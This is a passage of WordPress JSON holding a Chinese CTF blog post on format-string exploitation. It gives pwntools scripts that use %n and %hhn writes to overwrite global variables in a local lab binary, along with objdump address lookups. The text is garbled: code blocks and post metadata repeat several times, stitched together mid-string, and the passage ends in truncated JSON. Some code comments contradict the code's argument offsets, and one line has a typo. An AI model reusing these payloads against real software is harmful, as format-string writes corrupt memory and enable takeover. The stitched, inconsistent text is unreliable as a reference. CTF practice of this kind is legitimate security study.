p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
b\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n
#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n
objdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n
\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":